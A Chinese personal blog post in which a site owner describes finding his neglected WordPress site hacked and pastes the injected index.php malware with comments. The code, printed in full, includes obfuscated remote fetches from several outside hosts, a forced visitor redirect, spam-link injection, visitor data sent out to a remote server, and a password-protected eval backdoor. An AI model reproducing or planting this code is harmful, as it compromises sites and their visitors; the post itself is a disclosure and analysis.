两年未管，网站被黑了……

网站两年没看，中途搬家了一次，6月份搬家了一次，今天偶然看一眼发现，我擦卡死，服务器配置低也不至于这样，查看代码一看被黑了。确实是两年来没更新我的疏忽，以后会断断续续慢慢更新。

网站做了如下调整：

1. 修复漏洞在 nginx 上开启了 waf 防火墙，然后域名也做了防护。
2. 升级了一下 wordpress 版本，然后全站 https 了。
3. 然后修复各种漏洞和权限调整。

今天被黑的主代码如下：

$id6fe1d0be634 = "/index/?2601510941471";
$z8c7dd922ad47 = md5($id6fe1d0be634);
$u77e8e1445762 = time();
$geaa082fa5781 = filemtime($z8c7dd922ad47);

// 查看md5参数后的文件是否存在，存在对比时间，存在读取数据
$u07cc694b9b3f = $u77e8e1445762 - $geaa082fa5781;
if (file_exists($z8c7dd922ad47)) {
    $fe1260894f59e = fopen($z8c7dd922ad47, base64_decode('cg=='));
    $xe4e46deb7f9c = json_decode(base64_decode(fread($fe1260894f59e, filesize($z8c7dd922ad47))) , 1);
    fclose($fe1260894f59e);
}

// 不存在，获取生成时间大于60秒，执行操作，这段重点内容就是从远程
// 地址获取域名，然后拼接地址 
`http://taxitogo.tk/index/?2601510941471`
if ($u07cc694b9b3f >= 60 || !file_exists($z8c7dd922ad47)) {
    $v9b207167e538 = getDDroi($z8c7dd922ad47);

    if ($v9b207167e538[base64_decode('ZG9tYWlu') ]) {
        $je617ef6974fa = base64_decode('aHR0cDovLw==') . $v9b207167e538[base64_decode('ZG9tYWlu') ] . $id6fe1d0be634;
    } else {
        $wd88fc6edf21e = curl_init();
        curl_setopt($wd88fc6edf21e, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($wd88fc6edf21e, CURLOPT_USERAGENT, base64_decode('QUkgcnNydg=='));
        curl_setopt($wd88fc6edf21e, CURLOPT_URL, $xe4e46deb7f9c[base64_decode('cnNydg==') ]);
        curl_setopt($wd88fc6edf21e, CURLOPT_TIMEOUT, 10);
        $sad5f82e879a9 = curl_exec($wd88fc6edf21e);
        curl_close($wd88fc6edf21e);
        $je617ef6974fa = base64_decode('aHR0cDovLw==') . $sad5f82e879a9 . $id6fe1d0be634;
    }
} else {
    $je617ef6974fa = base64_decode('aHR0cDovLw==') . $xe4e46deb7f9c[base64_decode('ZG9tYWlu') ] . $id6fe1d0be634;
}
function getDDroi($z8c7dd922ad47) {
    $wd88fc6edf21e = curl_init();
    curl_setopt($wd88fc6edf21e, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($wd88fc6edf21e, CURLOPT_USERAGENT, base64_decode('QUkgcm9p'));
    curl_setopt($wd88fc6edf21e, CURLOPT_URL, base64_decode('aHR0cDovL3JvaTc3Ny5jb20vZG9tYWluX3RlbXAucGhwP2Y9anNvbg=='));
    curl_setopt($wd88fc6edf21e, CURLOPT_TIMEOUT, 10);
    $sb4a88417b3d0 = curl_exec($wd88fc6edf21e);
    curl_close($wd88fc6edf21e);
    $xe4e46deb7f9c = json_decode($sb4a88417b3d0, true);
    if ($xe4e46deb7f9c[base64_decode('ZG9tYWlu') ]) {
        $y0666f0acdeed = @fopen($z8c7dd922ad47, base64_decode('dys='));
        fopen(a w+)
        @fwrite($y0666f0acdeed, base64_encode($sb4a88417b3d0));
        @fclose($y0666f0acdeed);
        return $xe4e46deb7f9c;
    } else return false;
}

// 判断cookie 是否存在，不存在创建cookie，并执行如下代码
// <script>window.location.replace("http://taxitogo.tk/index/?2601510941471");window.location.href = "http://taxitogo.tk/index/?2601510941471";</script>
// 第一次就跳转呀，我凑，这体验哭死我了

if (!$_COOKIE[base64_decode('YTc3N2Q=') ]) {
    setcookie(base64_decode('YTc3N2Q=') , 1, time() + 43200, base64_decode('Lw=='));
    echo base64_decode('PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgi') . $je617ef6974fa . base64_decode('Iik7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAi') . $je617ef6974fa . base64_decode('Ijs8L3NjcmlwdD4=');
}

//<script>window.location.replace("http://taxitogo.tk/index/?2601510941471");window.location.href = "http://taxitogo.tk/index/?2601510941471";</script>
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */
/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define('WP_USE_THEMES', true);
/** Loads the WordPress Environment and Template */
require (dirname(__FILE__) . '/wp-blog-header.php');
//##!#==##!#

// 时间，然后创建help文件，从 `http://fped8.org/linkovka/get.php` 内容并
// 写入到help,我凑这就是在我网站上加上各种链接呀。

$time_sec = time();
$time_file = @filemtime("help");
$time = $time_sec - $time_file;
if ($time > 86400 || !$time_file) {
    $handle = @fopen("help", "w+");
    if ($handle) {
        $f = @file_get_contents(str_rot13("uggc://scrq8.bet/yvaxbixn/trg.cuc"));
        @fwrite($handle, $f);
    }
} else {
    $handle = @fopen("help", "r");
    $f = @fread($handle, filesize("help"));
}
echo $f;

// 然后这里很简单 其实就是 assert(str_rot13(底下一大堆))，亲们可以自己测试，
@ini_set("error_log", NULL);
@ini_set("log_errors", 0);
@ini_set("display_errors", 0);
error_reporting(0);
$wa = ASSERT_WARNING;
@assert_options($wa, 0);
@assert_options(ASSERT_QUIET_EVAL, 1);
$strings = "as";
$strings.= "se";
$strings.= "rt";
$strings2 = "st";
$strings2.= "r_r";
$strings2.= "ot13";
str_rot13(riny())
$gbz = "riny(" . $strings2("base64_decode");
$light = $strings2($gbz . '("nJLtXPScp3AyqPtxnJW2XFxtrlNtDTyhnI9mMKDbVzEcp3OfLKysMKWlo3WmVvkzLJkmMFx7DTIlpz9lK3WypT9lqTyhMltjXGfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxtWvLtMJ1jqUxbWTyvqvxcVUftWTyvqvN9VPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKGftVTIwnT8tWTyvqwg9VTIfp2IcMvNbMJ1jqUxbWTyvqvxcVUfXnJLtXUA0paA0pvtxK1ASHyMSHyfvFSEHHS9VG1AHVy0fVPVkZwphZPVcXKfxozSgMFN9VPEsH0IFIxIFJlWGEIWJEIWsDHERHvWqB31yoUAyrlEhLJ1yVQ0tWS9GEIWJEIWoVxuHISOsFR9GIPWqB30XWUImMKWuVQ0tnKAmMKDbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXG91pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXGbvVwfXWUIloPN9VPWbqUEjBv8in29mqQugMJDho3WaY2qyqP5jnUN/nKN9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyWSGH9HEI9OEREFVy0cYvVzMQ0vYaIloTIhL29xMFtxozSgMF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKFxhVvM1CFVhWUImMKWuYvVznG0kWzt9Vv5gMQHbVwHkZTMzAmZ0Zmp3ZQN5ZzMvBGx2ZTVjBGuuL2H0ATSuZGRvXGfXnJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGgwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsD09BGxIQISEWGHICIIDfVQHcBlOwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsIRyAEH9IIPjtAFx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9FEIEIHx5HHxSBH0MSHvjtISWIEFx7PvEcLaLtCFOwqKWfK2I4MJZbWTAbXGfxnJ5zolN9VTA1pzksM2I0nJ5zoltxL2tcB2yzVPtxnJ5zo1fvnUE0pS9wo2EyVy0uCGVjZPy7WTyvqw0vVwg9PzA1pzksL2kip2HbWTAbXGfXsFOyoUAynJLbnJ5cK2qyqPtvLJkfo3qsqKWfK2MipTIhVvxtCG0tZFxtrjbxnJW2VQ0tMzyfMI9aMKEsL29hqTIhqUZbWUIloPx7Pa0XnJLbVJIgpUE5XPEsHR9GISfvpPWqXFNzWvOgMQHboJD1XPEsHR9GISfvpPWqXFxtCG0tVwx4MQH2L2DmMzZjAmNlMzV3LzMuBGMuBGIwLwx2ATD3VvxtrlONMKMuoPumqUWcpUAfLKAbMKZbWS9DG1AHJlWwVy0cXGftsDcyL2uiVPEcLaL7Pa0tsD=="));');
$strings($light);
//##!#==##!#

// 上边这一大堆解析成代码就是

if (!isset($ibv)) {
    @ini_set("display_errors", false);
    @error_reporting(0);
    if (!empty($_COOKIE["client_check"]) && empty($ibv)) {
        $ibv = $_COOKIE["client_check"];
        echo $ibv;
    } elseif (empty($ibv)) {
        if (strstr($_SERVER["HTTP_HOST"], "127.0")) {
            $name = $_SERVER["SERVER_ADDR"];
        } else {
            $name = $_SERVER["HTTP_HOST"];
        }
        $usera = isset($_SERVER["HTTP_USER_AGENT"]) ? urlencode($_SERVER["HTTP_USER_AGENT"]) : "";
        $url = "http://kost8med.org/get.php?ip=" . urlencode($_SERVER["REMOTE_ADDR"]) . "&d=" . urlencode($name . $_SERVER["REQUEST_URI"]) . "&u=" . $usera . "&i=1&h=" . md5("510ff7343770092fb9960b098ace44aa11");
        if (function_exists("curl_init")) {
            $ch = curl_init($url);
            curl_setopt($ch, CURLOPT_HEADER, FALSE);
            curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
            $ibv = curl_exec($ch);
            $info = curl_getinfo($ch);
            if ($info["http_code"] != 200) {
                $ibv = "";
            }
            curl_close($ch);
        } elseif (ini_get("allow_url_fopen") == 1) {
            $ibv = file_get_contents($url);
        }
        if (!empty($_POST["p"]) && md5(md5($_POST["p"])) == "98d56cd3fc0702fb7bfa96a95cb964d7") {
            @eval(stripslashes($_POST["c"]));
        }
        echo $ibv;
    }
}

好了，就到这里感谢这位大哥不辞辛苦的渗透，其实我的网站没啥流量了现在，这里也说明下，以后会慢慢重新开始更新。